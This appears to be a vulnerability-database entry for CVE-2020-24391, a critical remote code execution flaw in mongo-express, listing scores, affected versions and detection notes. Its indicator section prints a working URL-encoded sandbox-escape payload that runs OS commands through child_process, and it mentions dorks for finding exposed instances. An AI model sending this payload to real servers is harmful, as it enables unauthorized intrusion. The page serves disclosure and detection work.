cbcvebase.
CVE-2020-24391
published 2021-03-30

CVE-2020-24391: mongo-express before 1.0.0 offers support for certain advanced syntax but implements this in an unsafe way. NOTE: this may overlap CVE-2019-10769.

PriorityP271critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
75.09%
99.4th percentile
mongo-express before 1.0.0 offers support for certain advanced syntax but implements this in an unsafe way. NOTE: this may overlap CVE-2019-10769.

Affected

1 ranges
VendorProductVersion rangeFixed in
mongo-express_projectmongo-express<= 0.54.0

Detection & IOCsextracted from sources · hover to see the quote

url/checkValid
path/public/css/{{randstr}}.css
commanddocument=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++
yara
((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)
  • Exploit sends a POST request to /checkValid with a URL-encoded JavaScript payload in the `document` parameter that uses `clearImmediate.constructor` to escape the safer-eval sandbox and execute arbitrary OS commands via `child_process.execSync`.
  • After exploitation, the attacker retrieves command output by fetching a CSS file written to the public directory; a successful RCE response body will match the regex `((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)` with HTTP 200.
  • Shodan, FOFA, and Google dorks can be used to identify exposed Mongo-Express instances as attack targets.
  • The Content-Type `application/x-www-form-urlencoded` is used to deliver the sandbox-escape payload to the /checkValid endpoint; monitor for large or unusual `document` parameter values on this endpoint.
  • ·The vulnerability affects mongo-express versions before 1.0.0 only; instances running 1.0.0 or later are not affected.
  • ·This CVE may overlap with CVE-2019-10769, so deduplication of alerts may be necessary in environments tracking both.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa9.8CRITICAL
osv9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.